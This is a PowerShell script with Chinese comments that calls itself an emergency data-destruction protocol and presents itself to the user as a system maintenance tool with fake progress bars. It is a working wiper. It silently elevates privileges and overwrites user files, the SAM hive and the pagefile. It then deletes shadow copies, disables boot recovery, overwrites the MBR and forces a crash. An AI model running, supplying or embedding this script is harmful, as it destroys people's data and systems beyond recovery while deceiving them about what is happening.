<#
.EmergencyProtocol Black
适用场景：设备即将落入敌对势力手中时使用
终极数据湮灭协议 - 影武者模式 v4.0
[!] 执行后系统将不可恢复 [!]
#>

# 隐蔽权限检查
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Start-Process powershell.exe "-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
    exit
}

# 暗色界面输出
function Show-StealthHeader {
    $host.UI.RawUI.BackgroundColor = 'Black'
    $host.UI.RawUI.ForegroundColor = 'DarkGray'
    Clear-Host
    
    Write-Host "`n[ 系统维护工具 v3.2.1 ]`n" -ForegroundColor Gray
    Write-Host "正在扫描系统健康状态..." -ForegroundColor DarkYellow
    Start-Sleep -Seconds 2
}

# 伪进度条
function Show-FakeProgress {
    param($Phase)
    for ($i = 0; $i -le 100; $i+=5) {
        Write-Progress -Activity "系统诊断 ($Phase)" -Status "扫描中..." -PercentComplete $i
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 300)
    }
}

# 军用级数据覆写
function Invoke-BlackoutWipe {
    param($Path)
    try {
        $stream = [System.IO.File]::Open($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Write)
        $size = $stream.Length
        
        # 三重动态覆写模式
        1..3 | ForEach-Object {
            $stream.Position = 0
            $rng = [System.Security.Cryptography.RNGCryptoServiceProvider]::new()
            $buffer = [byte[]]::new([Math]::Min(1MB, $size))
            
            $bytesWritten = 0
            while ($bytesWritten -lt $size) {
                $rng.GetBytes($buffer)
                $stream.Write($buffer, 0, $buffer.Length)
                $bytesWritten += $buffer.Length
            }
        }
        $stream.SetLength(0)  # 截断文件
    } catch {}
    finally { if ($stream) { $stream.Close() } }
}

# 主执行流程
Show-StealthHeader
Show-FakeProgress -Phase "初始化"

# 阶段1：隐蔽目标定位
$CriticalTargets = @(
    "$env:USERPROFILE",
    "$env:SystemRoot\System32\config\SAM*",
    "$env:ProgramData\Microsoft\Windows\Recent",
    "C:\Windows\Temp",
    "C:\pagefile.sys"
) | Where-Object { Test-Path $_ }

# 阶段2：静默数据湮灭
Show-FakeProgress -Phase "数据分析"
foreach ($target in $CriticalTargets) {
    if (Test-Path $target -PathType Container) {
        Get-ChildItem $target -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object {
            try {
                if (-not $_.PSIsContainer) {
                    Invoke-BlackoutWipe -Path $_.FullName
                    Rename-Item $_.FullName -NewName ("$($_.Name).tmp$(Get-Random -Minimum 1000 -Maximum 9999)") -Force
                }
            } catch {}
        }
    } else {
        Invoke-BlackoutWipe -Path $target
    }
}

# 阶段3：系统瘫痪准备
Show-FakeProgress -Phase "系统优化"
try {
    # 破坏性命令伪装成系统更新
    cmd /c "vssadmin delete shadows /all /quiet" 2>$null
    bcdedit /set {default} bootstatuspolicy ignoreallfailures 2>$null
    bcdedit /set {default} recoveryenabled no 2>$null
    
    # 覆盖MBR前512字节
    $mbrData = [byte[]]::new(512)
    [System.Security.Cryptography.RNGCryptoServiceProvider]::new().GetBytes($mbrData)
    $disk = [System.IO.File]::OpenWrite("\\.\PhysicalDrive0")
    $disk.Write($mbrData, 0, 512)
    $disk.Close()
} catch {}

# 最终阶段
Write-Host "`n[!] 系统维护完成，需要重启生效" -ForegroundColor Yellow
Start-Sleep 3

# 隐蔽关机（伪装成蓝屏）
$shutdownCode = @'
using System;
using System.Runtime.InteropServices;
public class CriticalOps {
    [DllImport("ntdll.dll")] 
    public static extern int RtlSetProcessIsCritical(int a, int b, int c);
    public static void MakeCritical() {
        RtlSetProcessIsCritical(1, 0, 0); 
        System.Diagnostics.Process.GetCurrentProcess().Kill();
    }
}
'@
Add-Type -TypeDefinition $shutdownCode -ErrorAction SilentlyContinue
[CriticalOps]::MakeCritical()

# 备用关机指令
Start-Sleep 5
Stop-Computer -Force